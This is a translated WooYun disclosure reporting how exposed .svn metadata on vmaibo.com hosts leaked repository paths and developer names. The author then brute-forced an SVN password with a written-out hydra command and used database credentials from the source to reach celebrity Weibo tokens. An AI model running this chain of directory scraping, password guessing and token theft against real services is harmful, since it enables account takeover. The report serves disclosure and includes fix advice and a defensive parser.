
Vulnerability summary

Defect ID: wooyun-2013-036894

Title: Sensitive information disclosure series #2: poor development and operations management can lead to takeover of Weibo celebrity ("big V") accounts

Vendor: vmaibo.com

Author: 猪猪侠

Submitted: 2013-09-12 19:29

Fixed: 2013-10-27 19:30

Published: 2013-10-27 19:30

Type: Sensitive information disclosure

Severity: High

Self-rated Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-09-12: Details sent to the vendor, awaiting vendor handling
2013-09-13: Vendor confirmed; details visible to the vendor only
2013-09-23: Details disclosed to core white hats and domain experts
2013-10-03: Details disclosed to regular white hats
2013-10-13: Details disclosed to intern white hats
2013-10-27: Details disclosed to the public

Brief description:

Sometimes a seemingly trivial information leak is enough to bring down an entire enterprise's security.
Over the past few years the security field has made real progress in assessing its own vulnerabilities. At the same time almost every enterprise and individual relies more and more on third-party systems to run their business, so a compromise of a third-party system also raises the threat to the enterprises that depend on it.
#Security has to cover the whole picture#
Sequel to http://www.wooyun.org/bugs/wooyun-2013-032750!

Detailed description:

#1 Scanning showed that every vmaibo business system exposes its SVN working-copy metadata (.svn/entries)
http://www.vmaibo.com/.svn/entries
http://biz.vmaibo.com/.svn/entries
http://read.vmaibo.com/.svn/entries

svn_disclosure.py http://vmaibo.com /
*****************************************************
* Fetching: http://vmaibo.com
* mkdir vmaibo.com
* svn://127.0.0.1:3396/vmaibo-person
* svn://127.0.0.1:3396
*****************************************************
/Lang
/Conf
FILE: jsversons.php
FILE: routes.php
FILE: config-dev.php
FILE: config-release.php
/upgrade
FILE: 360_update_file.php
FILE: 360_update_file2.php
FILE: wb_recommend_user.php
FILE: wb_recommend_user_delete.php
FILE: update_table_data.php
FILE: insert_competitor_data.php
FILE: 360_add_table.php
/Common
FILE: common.php
/contact
FILE: index.php
/Tpl
FILE: layout.html
FILE: dispatch_jump.tpl
FILE: think_exception.tpl
/Tpl/Timer
FILE: repost.html
FILE: history.html
FILE: index_bak.html
FILE: index.html
/Tpl/Using
FILE: index.html
/Tpl/Fans
FILE: default.html
FILE: index.html
/Tpl/Material
FILE: index.html
FILE: add.html
/Tpl/Service
FILE: integrate.html
FILE: weibo.html
FILE: index.html
/Tpl/Customer
FILE: first_page.html
FILE: index.html
/Tpl/Comment
FILE: index.html
FILE: setReply.html
/Tpl/Track
FILE: index.html
/Tpl/Attention
FILE: index.html
/Tpl/Permition
FILE: none.html
/Tpl/Sentiment
FILE: detonate.html
FILE: index.html
/Tpl/Messages
FILE: comment.html
FILE: comment2.html
FILE: index.html
/Tpl/Member
FILE: auth.html
FILE: agreement.html
FILE: join_ok.html
/Tpl/Index
FILE: main-bak.html
FILE: main.html
FILE: index.html
/Tpl/Recommend
FILE: indexcomment2.html
FILE: tencent_category.html
FILE: other_bak.html
FILE: other_category.html
FILE: tencent.html
FILE: other.html
FILE: index.html
FILE: indextezhu.html
FILE: indexsfx.html
FILE: index2.html
FILE: indexcomment.html
/Tpl/Besiness
FILE: index.html
/Tpl/Tool
FILE: index.html
/Tpl/Public
FILE: footer.html
FILE: left_menu.html
FILE: header.html
FILE: left_menu-bk.html
FILE: cookie.js
FILE: ContentState.js
FILE: left_menu.js
FILE: Teaching.js
FILE: kingwolfofsky.js
FILE: atUser.js
/Tpl/Public/js
/script
FILE: clean_detonated.php
FILE: kaifu.php
/script/log
/Lib
/Public
*****************************************************
Author: xlxi
Author: xm
Author: zhouli
Author: ygli
Author: fqwang
Author: xxl
*****************************************************


# Weibo celebrity edition

svn_disclosure.py http://read.vmaibo.com /
*****************************************************
* Fetching: http://read.vmaibo.com
* mkdir read.vmaibo.com
* svn://219.239.***.*:3396/vmaibo-read
* svn://219.239.***.*:3396
*****************************************************
/Test
FILE: Test.php
/Lang
/Runtime
/Conf
FILE: jsversons.php
FILE: authuser.php
FILE: routes.php
/upgrade
/scripts
FILE: talk.php
FILE: timer_pid.php
FILE: timer.php
FILE: config.php
/scripts/log
/scripts/plugin
FILE: Sina.class.php
/Common
FILE: common.php
/manage
FILE: index.php
/manage/My97DatePicker
FILE: config.js
FILE: calendar.js
FILE: My97DatePicker.htm
FILE: WdatePicker.js
FILE: zh-cn.js
/manage/My97DatePicker/lang
FILE: datePicker.gif
FILE: Thumbs.db
FILE: WdatePicker.css
/manage/My97DatePicker/skin
/manage/conf
FILE: driver.php
FILE: config.php
/manage/lib
FILE: ActionBase.class.php
FILE: Page.class.php
FILE: Helper.class.php
/manage/template
FILE: talk_audit.js
FILE: index.php
/manage/action
FILE: TalkAudit.class.php
/Tpl
/Lib
/Data
/Api
FILE: index.php
/Api/conf
FILE: config.php
/Api/modules
FILE: show_user.php
FILE: status_counts.php
FILE: daily_trends.php
FILE: repost_timeline.php
FILE: shorten.php
FILE: show_status.php
FILE: user_timeline.php
FILE: trends_timeline.php
FILE: get_comments_by_mid.php
FILE: status_search.php
/Api/libs
FILE: callback.php
FILE: config.php
FILE: weibooauth.php
FILE: index.php
FILE: success.php
/Public
*****************************************************
Author: xlxi
Author: fqwang
Author: ygli
*****************************************************
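The two listings above come from walking the exposed .svn/entries files. As an added example (not the original author's svn_disclosure.py and not vmaibo code), the following parser shows what a pre-1.7 (format 8-10) entries file gives away and doubles as a check an operator can run against their own hosts to verify fix #1; the sample entries text, host name and committer names are constructed.

```python
# Audit helper for the .svn exposure described above: added example, not the
# original author's svn_disclosure.py or any vmaibo code. It parses the pre-1.7
# (format 8-10) .svn/entries layout and lists what a stray /.svn/ gives away.
# Field positions inside one entry block of that format.
NAME, KIND, URL, REPOS, LAST_AUTHOR = 0, 1, 3, 4, 10


def parse_entries(text: str) -> dict:
    """Parse an .svn/entries body; raise ValueError if it is not one."""
    blocks = text.split("\x0c\n")           # one form-feed-separated block per entry
    header = blocks[0].split("\n", 1)       # the very first line is the format number
    if not header[0].strip().isdigit():
        raise ValueError("not an SVN entries file")
    blocks[0] = header[1] if len(header) > 1 else ""
    leak = {"format": int(header[0]), "repo_root": "",
            "files": [], "dirs": [], "authors": set()}
    for block in blocks:
        if not block.strip():
            continue
        f = block.split("\n")
        f += [""] * (LAST_AUTHOR + 1 - len(f))  # short entries omit trailing fields
        if f[NAME] == "":                        # the directory's own entry
            leak["repo_root"] = f[REPOS] or f[URL]
        elif f[KIND] == "dir":
            leak["dirs"].append(f[NAME])
        else:
            leak["files"].append(f[NAME])
        if f[LAST_AUTHOR]:                       # committer usernames leak here
            leak["authors"].add(f[LAST_AUTHOR])
    return leak


def assess_probe(body: bytes) -> str:
    """Classify what a GET of /.svn/entries or /.svn/wc.db on your own host returned."""
    if body.startswith(b"SQLite format 3\x00"):
        return "exposed: SVN 1.7+ wc.db (SQLite) is downloadable"
    try:
        parse_entries(body.decode("utf-8", "replace"))
        return "exposed: pre-1.7 entries file is readable"
    except ValueError:
        return "not exposed"


# Constructed sample: root entry, one file, one subdirectory, made-up committers.
SAMPLE = (
    "10\n\ndir\n123\nsvn://svn.example.test:3396/project/trunk\n"
    "svn://svn.example.test:3396/project\n\n\n\n2013-09-01T10:00:00.000000Z\n123\ndev_a\n\x0c\n"
    "config-release.php\nfile\n\n\n\n\n\n\n2013-08-30T08:00:00.000000Z\n120\ndev_b\n\x0c\n"
    "Conf\ndir\n\x0c\n"
)
```

SVN 1.7 and later no longer write an entries file but a single SQLite database at .svn/wc.db, which is why assess_probe checks for both.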


#2 Indirect exploitation of the information leaked through SVN
The leaked metadata revealed the real address of the SVN server, 219.239.***.*; combined with the author names already collected, a weak-password dictionary was built and automated brute-force guessing was run.

Author: xlxi
Author: fqwang
Author: ygli
Author: xlxi
Author: xm
Author: zhouli
Author: xxl


./hydra -L vmaibo_user.txt -P vmaibo_pass.txt 219.239.***.* Subversion
The weak password of user fqwang was successfully brute-forced: fqwang + 2013
#3 Checking out the development source via SVN

(image: svn_checkout.jpg)


Proof of vulnerability:

# Maibo's site ships its own phpMyAdmin; connected using the database password found in the source tree
http://read.vmaibo.com/phpmyadmin/
http://www.vmaibo.com/phpmyadmin/

(image: weibo_利用_token.jpg)


# Admin backend address
http://adm.vmaibo.com/login
# Indirect exploitation: Kai-Fu Lee's Weibo TOKEN can be obtained directly
The affected big-V accounts are listed at: http://www.vmaibo.com/using

Fix recommendations:

#1 Remove the exposed .svn directories from the web roots
#2 Rename the phpMyAdmin path
#3 Do not expose the SVN server's management port to the Internet

Copyright notice: please credit 猪猪侠@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2013-09-13 15:38

Vendor reply:

Thank you for reporting this vulnerability. We have started handling it and are carrying out security remediation. Thanks, 猪猪侠!

Latest status:

None yet